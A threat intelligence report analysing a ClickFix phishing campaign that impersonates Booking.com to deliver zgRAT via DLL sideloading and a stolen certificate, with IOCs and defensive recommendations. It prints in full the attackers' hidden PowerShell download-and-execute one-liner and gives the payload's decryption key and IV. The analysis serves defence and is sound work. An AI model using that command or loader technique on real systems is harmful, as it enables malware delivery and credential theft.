highPhishing

Booking.com ClickFix Drops zgRAT via Stolen Dodo.com Wildcard Cert: Bulletproof Hosting, DLL Sideloading, and 14 Phishing Subdomains Targeting Hospitality

PublishedMarch 12, 2026

Threat Actors:+ Eazfuscator obfuscationCrypter (a8d214b3...)+ Eazfuscator string encryption (dual-layer)ProfileAssessmentTimelinepatterns

phishingdll-sideloadingsocial-engineeringcredential-theftc2exploitaptspearphishing

TL;DR: A three-wave malware campaign running since December 2025 impersonates Booking.com verification pages to trick hospitality sector victims into executing PowerShell. The attack chain delivers zgRAT with PureHVNC through DLL sideloading -- a legitimate psl.exe binary loads a trojanized 7MB libpsl-5.dll with 99 obfuscated exports. The payloads are signed with a stolen *.dodo.com wildcard certificate that has CA:TRUE basic constraints, effectively making it a sub-CA certificate being weaponized for code signing. The C2 infrastructure sits on AS208885, a freshly minted autonomous system registered to an individual in Tajikistan through the zanemint-mnt hosting broker -- a textbook bulletproof hosting arrangement with upstream transit through Lithuania and the UK, and Russian hosting ecosystem ties including cloudrix.ru. We mapped 12+ malware samples, 7 campaign domains, 14 phishing subdomains, 2 ASN prefixes covering 512 IPs, and a dual Go/.NET loader architecture that gives this operation unusual flexibility.

It Starts With a Fake Booking Confirmation

The victim is a hotel front desk manager in Italy. An email arrives -- Booking.com branding, Italian language, something about a guest verification that needs attention. The link leads to what looks like a standard Booking.com CAPTCHA page. "Please verify you are human."

Except the page is hosted on bklmain.online.hailmeinc[.]com -- one of 14 subdomains the operator has spun up on a single HostGator India IP, all designed to impersonate Booking.com's verification flow.

The ClickFix technique has become the dominant initial access vector in early 2026, and for good reason: it transfers the execution burden entirely to the victim. No exploit. No macro. No attachment. The user copies a PowerShell command and pastes it into their own terminal. Email gateways never see it. Browser sandboxes never trigger. The EDR sees a user-initiated PowerShell execution, which looks a lot like IT administration.

The 14 subdomains all follow the same pattern -- variations on "bklmain" (a clear abbreviation of "Booking Main") with different TLD-style suffixes:

Subdomain	Pattern
bklmain.online.hailmeinc[.]com	Standard
bklmain.site.hailmeinc[.]com	Standard
bklmain.club.hailmeinc[.]com	Standard
bklmain.store.hailmeinc[.]com	Standard
bklmain.fun.hailmeinc[.]com	Standard
bklmain.shop.hailmeinc[.]com	Standard
bklmain.website.hailmeinc[.]com	Standard
bklmaint.xyz.hailmeinc[.]com	Typo variant
bkmmain.xyz.hailmeinc[.]com	Typo variant
bklnmain.xyz.hailmeinc[.]com	Typo variant
bklsmain.xyz.hailmeinc[.]com	Typo variant
bkmain.xyz.hailmeinc[.]com	Typo variant
blkmain.xyz.hailmeinc[.]com	Typo variant
bklmail.xyz.hailmeinc[.]com	Typo variant

The typo variants are interesting. They suggest the operator is either A/B testing which subdomain patterns evade URL filtering most effectively, or generating permutations to avoid domain-level blocklists. Either way, 14 subdomains for a single phishing theme on a single parent domain is aggressive.

All 14 resolve to 162.241.123.127 on HostGator India.

The PowerShell Kill Chain: From Clipboard to Full Compromise

Once the victim pastes the ClickFix command, the infection chain unfolds across four stages, each serving a distinct evasion purpose.

[1] SPAM (Italian, Booking.com themed)
     |
     v
[2] CLICKFIX PAGE (bklmain.*.hailmeinc.com)
     |-- Fake CAPTCHA/verification
     |-- Copies PowerShell to clipboard
     v
[3] STAGE 0: ads.ps1 (167 bytes)
     |-- One-liner: IEX download from buqiwptshpqisy.com
     v
[4] STAGE 1: Full PS1 Loader (~10KB)
     |-- Fingerprints victim (user, PC, OS, AV, admin)
     |-- Reports to seomorry.com/tituqs (tracking)
     |-- Downloads ZIP from empowerhouseproject.org
     |-- Extracts to hidden AppData folder
     |-- Adds HKCU\...\Run persistence
     |-- Executes payload
     v
[5] STAGE 2: ZIP PACKAGE
     |-- psl.exe (legitimate PSL utility, 70KB)
     |-- libpsl-5.dll (trojanized, 7MB, 99 exports)
     |-- MSYS2 DLLs (legitimate cover)
     v
[6] DLL SIDELOADING: psl.exe loads libpsl-5.dll
     v
[7] PAYLOAD: zgRAT + PureHVNC
     |-- .NET Reactor + Eazfuscator obfuscation
     |-- TripleDES-CBC + GZip encrypted inner payload
     |-- C2: asmweosiqsaaw.com (95.85.244.166)
     v
[8] ACTIONS: Remote access, screen control, credential theft

Stage 0: The 167-Byte Trigger

The initial payload is almost comically small:

powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -Command "iex ((New-Object Net.WebClient).DownloadString('https://buqiwptshpqisy[.]com/jsyqi20458aq'))"

One hundred sixty-seven bytes. That is the entire initial payload -- a one-liner that downloads and executes the real loader. The -WindowStyle Hidden flag ensures the victim never sees a PowerShell window. This is the payload that gets copied to the clipboard from the ClickFix page.

Stage 1: The Fingerprinting Loader

The downloaded PowerShell script is roughly 10KB and substantially more sophisticated. Before it ever touches a payload, it profiles the victim:

Username and hostname
OS version and PC model/manufacturer
PowerShell version
Admin status
Installed antivirus products

All of this telemetry gets sent to seomorry[.]com/tituqs with a hardcoded tracking UUID (b15f31a4-487b-4b46-b59d-98ac0c873c61). This is not just a delivery mechanism -- it is a targeting pipeline. The operator can see exactly who is getting infected, what AV they are running, and whether they have admin access, before the actual malware is even deployed.

The loader also includes sandbox evasion via benign API calls. It contacts httpbin.org, catfact.ninja, boredapi.com, and adviceslip.com with random sleep intervals -- legitimate API traffic designed to make the execution profile look normal to automated analysis systems.

Once satisfied that the environment is real, the loader downloads a ZIP from empowerhouseproject[.]org, extracts it to a hidden folder in the user's AppData hierarchy (trying five different paths), sets a registry Run key for persistence, and launches the payload.

The DLL Sideloading Package: Hiding in Plain Sight

The ZIP package is where this campaign gets clever.

Component	Size	Purpose
psl.exe	70KB	Legitimate PSL (Public Suffix List) utility
libpsl-5.dll	7MB	Trojanized DLL -- the actual malware
10 MSYS2 DLLs	Various	Legitimate cover libraries (libiconv, libidn2, libintl, etc.)

The attack exploits DLL search order hijacking. When psl.exe starts, it imports libpsl-5.dll -- a library it legitimately depends on. But instead of loading the real libpsl library, it loads the attacker's 7MB trojanized version sitting in the same directory.

The trojanized DLL has 99 exported functions, all with randomized names like 145cmSBLdUbJI0CMGum and 1pCFOJ6M4xoy. The 10 legitimate MSYS2 libraries (libiconv-2.dll, libidn2-0.dll, libintl-8.dll, libunistring-5.dll, and their msys equivalents) exist solely to make the package look like a legitimate developer tool distribution -- a directory full of recognizable open-source libraries alongside a small utility binary.

This is a textbook sideloading setup, and it works well because psl.exe is a legitimate, signed binary. EDR products that rely on process reputation will see a known-good executable loading a DLL from its own directory -- normal behavior.

Dual Architecture: Go Meets .NET Reactor

Here is where this campaign diverges from the typical commodity stealer operation. The actor maintains two completely separate loader frameworks for the same final payload:

The Go DLL (Wave 3, March 2026)

Attribute	Value
SHA-256	`137326ac5fc9...35d2`
Size	10.7 MB
Compiler	Go 1.24.5 with CGo bindings
Module	`arlington/`
Source files	main.go, accessory.go, collaborative.go, experience.go, investors.go, manhattan.go, necessity.go, portraits.go, stockholm.go
Exports	GetInstallDetailsPayload, SignalInitializeCrashReporting
Signing	Stolen *.dodo[.]com wildcard certificate
Timestamp	Zeroed (1970-01-01) -- deliberate anti-forensics

The Go module is named "arlington" and its source files read like a random word generator hit a thesaurus: accessory.go, collaborative.go, experience.go, investors.go, manhattan.go. This is not a human naming files. It is automated obfuscation designed to make each build look different while maintaining the same codebase.

The exports -- GetInstallDetailsPayload and SignalInitializeCrashReporting -- are designed to mimic legitimate installer and crash reporting frameworks. If an analyst glances at the export table, it looks like a mundane software component.

The .NET Reactor Crypter (Parallel Delivery)

Attribute	Value
SHA-256	`a8d214b32d8d...f44`
Size	748 KB
Assembly	Zftgbtgff
Framework	.NET 4.x
Obfuscation	.NET Reactor + Eazfuscator (dual-layer)
Timestamp	2060-04-11 (stomped)
.text entropy	7.996 (near-maximum -- heavy encryption)

The .NET variant takes a different approach to evasion: dual-layer obfuscation. .NET Reactor handles the outer packing and control flow obfuscation, while Eazfuscator encrypts all strings. The inner payload is encrypted with TripleDES-CBC:

Algorithm:  TripleDES-CBC
Key (B64):  lh6OkPL1oZYmVVWK8rovvQ== (16 bytes, extended to 24)
IV (B64):   +Co+EjlbnIo= (8 bytes)
Compression: GZip after decryption
Resource:    "Hcszik" (encrypted payload in .NET managed resource)
Password:    "So0rqvBxLb" (key derivation salt)

After decryption and decompression, the inner payload is zgRAT with PureHVNC -- full remote desktop control, credential theft from browsers and email clients, and persistent access.

The dual-architecture approach is significant. If a defender writes detection for the Go variant, the .NET variant slips through, and vice versa. The operator is hedging their bets with two entirely different evasion strategies converging on the same final payload and C2.

The Stolen Certificate: How a Wildcard SSL Became a Code Signing Weapon

This is one of the more unusual findings in the investigation.

The Go DLL is signed with a certificate for *.dodo.com -- a wildcard SSL/TLS certificate issued by GlobalSign RSA OV SSL CA 2018. But it is being used for code signing.

Attribute	Value
Subject	CN=*.dodo.com
Issuer	GlobalSign RSA OV SSL CA 2018
Serial	60F33E3BFC90BB4181EE461E
Valid	2025-10-02 to 2026-11-03
Key	RSA 4096-bit
Key Usage	Digital Signature, Certificate Sign (CRITICAL)
Basic Constraints	CA:TRUE (CRITICAL)

The CA:TRUE flag and Certificate Sign key usage make this a sub-CA certificate -- not a standard leaf certificate. This means it has the authority to sign other certificates, which is why it can be (ab)used for code signing. A normal wildcard SSL certificate cannot sign code. This one can, because it was issued with intermediate CA capabilities.

There are two explanations: either this certificate was stolen from dodo.com's infrastructure (where it may have been used as an internal sub-CA), or it was fraudulently issued by GlobalSign. Either way, it is now signing malware and needs to be revoked.

Bulletproof Hosting: Following the Infrastructure Down the Rabbit Hole

The primary C2 domain asmweosiqsaaw[.]com resolves to 95.85.244.166, which belongs to AS208885 -- and this is where the investigation gets interesting.

Tier 0 (Transit):
  AS61272 IST-AS (Lithuania)
  AS213893 IPTR-AS (IPTransit Business LTD, UK)
       |
       v
Tier 1 (Backbone):
  zanemint-mnt (Hosting broker, manages 95.85.240-248.0/24 = 2,304+ IPs)
  Associates: cloudrix.ru (RU), 1Cent Host (SE/EE/FI/NL/DE)
       |
       v
Tier 2 (Operational):
  AS208885 NFS-AS ("Noyobzoda Faridduni Saidilhom", Tajikistan)
  Prefixes: 86.54.24.0/24 + 95.85.244.0/24 (512 IPs)
  Created: 2025-07-04
       |
       v
Tier 3 (Endpoint):
  95.85.244.166 -> asmweosiqsaaw.com (C2, behind Cloudflare)

AS208885 was created on July 4, 2025 -- barely eight months ago. It is registered to "Noyobzoda Faridduni Saidilhom" with a Tajikistan address and an Outlook email address. This has every hallmark of a shell identity: a newly created ASN in a jurisdiction with minimal cybercrime enforcement, registered to a single individual, managed by a third-party hosting broker.

The hosting broker -- zanemint-mnt -- manages over 2,304 IPs across the 95.85.240-248.0/24 range. Its associates include cloudrix.ru (Russian abuse contact) and 1Cent Host, a bargain-basement hosting operation scattered across Sweden, Estonia, Finland, the Netherlands, and Germany.

The admin contact on AS208885 reveals another thread: an "Ecode" entity with a Russian phone number (+79954346314) and a Kostroma, Russia address. Kostroma is a small city northeast of Moscow -- not the kind of place you typically find hosting ASN administrators, but exactly the kind of detail that connects the Tajikistan shell registration to its actual Russian operators.

OPSEC Failures: The Trail They Left Behind

For all its technical sophistication, this operation has a laundry list of operational security mistakes:

Shared Cloudflare account: The johnny + princess NS pair links all campaign domains to a single Cloudflare account. One abuse report could burn the entire infrastructure.
Hardcoded tracking UUID: The value b15f31a4-487b-4b46-b59d-98ac0c873c61 appears in every PowerShell loader variant across all three waves. It is the single strongest clustering indicator.
RIPE registration chain: nfstj-mnt -> NFS33-RIPE -> "Noyobzoda Faridduni Saidilhom" + phone +992109389511. This chain is queryable by anyone with RIPE database access.
zanemint-mnt broker link: The same RIPE maintainer object manages both the C2 /24 and adjacent hosting infrastructure, tying the operational network to the broader BPH ecosystem.
Russian admin contact: The Ecode entity with the Kostroma address and Russian mobile number on AS208885 directly links the Tajikistan shell to Russian operations.
Certificate serial reuse: The *.dodo.com cert serial 60F33E3BFC90BB4181EE461E appears in Certificate Transparency logs, making it trivially searchable.
Go module codename: The "arlington" module name is consistent across builds. YARA rules targeting arlington/ in Go binaries will catch future samples.
Reused MalwareBazaar tags: All samples carry tags that link them together. The actor is not compartmentalizing uploads.

Three Waves, One Operator

The campaign has operated in three distinct waves over three months:

Date	Wave	Samples	Delivery	Notes
2025-12-04	Wave 1	msedge_elf.dll (4.4MB) + PS1 loaders	Italian spam	First observed, DLL masquerading as Edge
2025-12-09	Wave 2	msedge_elf.dll (9.2MB) + .NET EXE	Italian spam	Updated loaders, .NET variant added
2026-03-03-07	Wave 3	Go DLL + .NET crypter + ClickFix ZIP	ClickFix phishing	New delivery via fake Booking.com pages

The evolution from Wave 1 to Wave 3 shows increasing sophistication: the operator moved from simple DLL masquerading (naming their payload msedge_elf.dll) to a full DLL sideloading package with a legitimate binary and cover libraries. They added the Go-compiled loader alongside the .NET variant. And they shifted from direct email delivery to ClickFix social engineering, which has a higher success rate against modern email security.

Threat Actor Assessment

Attribute	Assessment
Confidence	MEDIUM
Region	Eastern Europe / CIS
Motivation	Financial -- credential theft, remote access
Sophistication	Professional -- multi-stage loader, dual architecture, stolen cert, BPH
Targeting	Hospitality sector, Italian-speaking regions

The evidence points consistently toward a CIS-based financially motivated group: Italian-language targeting (a common Eastern European cybercrime focus), Vietnamese and Chinese registrars (standard CIS OPSEC for domain privacy), Russian hosting ecosystem connections, PureHVNC (popular in Russian-speaking underground forums), and Booking.com-themed lures (a well-established Eastern European social engineering template).

This is not a nation-state operation. The targeting is opportunistic, the infrastructure is rented rather than owned, and the payload is a commodity RAT. But the execution -- dual loader architectures, stolen sub-CA certificates, bulletproof hosting on freshly minted ASNs -- puts this a tier above the typical "spray and pray" stealer crew.

MITRE ATT&CK Mapping

Tactic	Technique	ID	Implementation
Initial Access	Phishing: Spearphishing Link	T1566.002	Booking.com themed Italian spam
Execution	User Execution: Malicious Link	T1204.001	ClickFix/FakeCaptcha pages
Execution	Command and Scripting Interpreter: PowerShell	T1059.001	Multi-stage PS1 loaders (ads.ps1 + full loader)
Execution	Signed Binary Proxy Execution: DLL Side-Loading	T1574.002	psl.exe loads trojanized libpsl-5.dll
Persistence	Boot or Logon Autostart: Registry Run Keys	T1547.001	HKCU...\CurrentVersion\Run
Defense Evasion	Obfuscated Files: Software Packing	T1027.002	.NET Reactor + Eazfuscator dual-layer
Defense Evasion	Subvert Trust Controls: Code Signing	T1553.002	Stolen *.dodo.com sub-CA certificate
Defense Evasion	Virtualization/Sandbox Evasion	T1497	Benign API calls (catfact.ninja, httpbin.org) for timing
Defense Evasion	Masquerading: Match Legitimate Name	T1036.005	msedge_elf.dll, libpsl-5.dll
Discovery	System Information Discovery	T1082	PS1 fingerprinting (OS, model, AV products)
Discovery	System Owner/User Discovery	T1033	Username, admin status collection
Collection	Screen Capture	T1113	PureHVNC remote desktop
C2	Application Layer Protocol: Web	T1071.001	HTTPS to asmweosiqsaaw[.]com
C2	Web Service	T1102	Cloudflare-proxied C2
Exfiltration	Exfiltration Over C2 Channel	T1041	Via zgRAT C2 protocol

Indicators of Compromise

Network Indicators

# C2 Domains
asmweosiqsaaw[.]com          -- Primary C2
seomorry[.]com                -- Victim telemetry/tracking
buqiwptshpqisy[.]com         -- Stage 0 PS1 hosting
empowerhouseproject[.]org    -- Payload ZIP hosting
hailmeinc[.]com              -- ClickFix phishing pages (14 subdomains)
wiosyrondaty[.]com           -- PS1 delivery (wave 3)

# C2 IPs
95[.]85[.]244[.]166          -- AS208885, primary C2
162[.]241[.]123[.]127        -- HostGator India, phishing
208[.]109[.]21[.]36          -- GoDaddy, payload hosting
85[.]208[.]84[.]110          -- Online Connect Ltd UK, staging

# C2 URI Paths
/tituqs?id=&s=               -- Telemetry beacon (seomorry[.]com)
/jsyqi20458aq                -- PS1 download (buqiwptshpqisy[.]com)
/wiuyajsohiyq.zip            -- Payload download (empowerhouseproject[.]org)

# ASN
AS208885 (NFS-AS) -- 86.54.24.0/24, 95.85.244.0/24

# Cloudflare NS Pair (shared account pivot)
johnny[.]ns[.]cloudflare[.]com + princess[.]ns[.]cloudflare[.]com

File Indicators

# Go DLL (signed, wave 3)
SHA-256: 137326ac5fc9563532826dccf4442886bef1ec94a41654b9cbb6c963d78a35d2
imphash: 0951d9f67c9a9e1b6ea746ed01bccc26

# .NET Reactor Crypter (wave 3)
SHA-256: a8d214b32d8d0074b8dd8682852a66e9b4dd8566ea2e5255085858bc64034f44
imphash: f34d5f2d4577ed6d9ceec516c1f5a744

# msedge_elf.dll (wave 1)
SHA-256: 0b1ecb1d5505123ee64955f4cca064997b0139a31a8bf199097c7ab3d61d6a91

# msedge_elf.dll (wave 2)
SHA-256: d0c5a9d05ef2c84d44d026a4e6081fa19522c27773b4c263f657cb6015d30fe3

# .NET EXE (wave 2)
SHA-256: 625c148f7eacb68305880c51c7b7c217862ac253a6a804941c9d9224dd4e13e2

# ClickFix ZIP package
SHA-256: 6f4273c7f5d3c19365f05e95399140916d83e1d300b9ae652e93a3e6a043b509

# Trojanized libpsl-5.dll
SHA-256: 26f7c34675ba7a4e68a8fedf7b1ec903ff55b07ac0344d8ba8c689510a965bfd

# Legitimate psl.exe (sideloader)
SHA-256: 96db67104f1f0eb37e33097fa679c9e42f606be0455b55a7af4319e345c66124

# PowerShell loaders
SHA-256: fec2ca2210d1f07ddec3372dd51562f26ad27a2723b8e88d40f5a864b487e624  (stage 1)
SHA-256: a91e84a616f495f5497d113b718f419713ed1581d445daeb61b5297ef4a05fb3  (ads.ps1)

Behavioral Indicators

# Registry persistence
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\p8gx4zwgxrd9m_csq_oTK66*

# Installation directories
%LOCALAPPDATA%\uhwy97krbc_n5_upd_q8leg*\
%APPDATA%\uhwy97krbc_n5_upd_q8leg*\

# Downloaded ZIP
%TEMP%\z1lezbfux10e5l2_ptf6N2.zip

# Tracking UUID (hardcoded in all PS1 variants)
b15f31a4-487b-4b46-b59d-98ac0c873c61

# Code signing certificate
Serial: 60F33E3BFC90BB4181EE461E
Subject: CN=*.dodo.com
Issuer: CN=GlobalSign RSA OV SSL CA 2018

# .NET metadata
Assembly: Zftgbtgff
GUID: 6dd43ad4-a079-4909-92ad-9d6d4cfb14ad
Go module: arlington/

Recommended Actions

Immediate (24-48 hours)

Block all listed C2 domains and IPs at the network perimeter
Search EDR/SIEM for PowerShell execution with -WindowStyle Hidden -ExecutionPolicy Bypass downloading from the listed staging domains
Hunt for HKCU\...\Run keys matching the p8gx4zwgxrd9m pattern
Block the stolen *.dodo.com certificate by serial 60F33E3BFC90BB4181EE461E in code signing trust policies
Alert hospitality sector ISACs about the Booking.com-themed campaign

Short-term (1-2 weeks)

Deploy YARA rules targeting zgRAT .NET Reactor patterns and the arlington/ Go module name
Monitor the Cloudflare NS pair (johnny + princess) for new domains appearing under the same account
Block AS208885 (NFS-AS) at the organizational level if risk tolerance permits -- the entire /24 ranges are BPH infrastructure
Scan for psl.exe + libpsl-5.dll co-occurrence as a DLL sideloading indicator
Hunt for benign API beacon patterns (catfact.ninja, httpbin.org, adviceslip.com) in close temporal proximity to PowerShell execution

Medium-term (1-3 months)

Report the stolen *.dodo.com certificate to GlobalSign for revocation
Submit abuse reports to Mat Bao (Vietnam) for asmweosiqsaaw[.]com, HostGator India for hailmeinc[.]com phishing, and RIPE NCC for AS208885 BPH activity
Report AS208885 to upstream transit providers IST-AS (Lithuania) and IPTransit (UK) for bulletproof hosting
Monitor Certificate Transparency logs for new certificates on asmweosiqsaaw[.]com and related domains
Track zanemint-mnt RIPE maintainer for new ASN registrations -- the next shell identity will likely use the same broker

References

MalwareBazaar: https://bazaar.abuse.ch/sample/137326ac5fc9563532826dccf4442886bef1ec94a41654b9cbb6c963d78a35d2/
MalwareBazaar: https://bazaar.abuse.ch/sample/a8d214b32d8d0074b8dd8682852a66e9b4dd8566ea2e5255085858bc64034f44/
ThreatFox IOC: https://threatfox.abuse.ch/ioc/1667781/
ANY.RUN Sandbox: https://app.any.run/tasks/fb3e9d22-a34b-42c1-9602-1708d7423c58
ANY.RUN Sandbox: https://app.any.run/tasks/b49c90ff-f42f-4d0f-a199-ae3f673973b1
CAPE Sandbox: https://www.capesandbox.com/analysis/55846/
Triage: https://tria.ge/reports/260306-rw14kaav4s/

Published by Breakglass Intelligence. Investigation conducted 2026-03-10. 12+ samples analyzed. 7 domains mapped. 14 phishing subdomains identified. 512 IPs across 2 ASN prefixes attributed to bulletproof hosting. Classification: TLP:CLEAR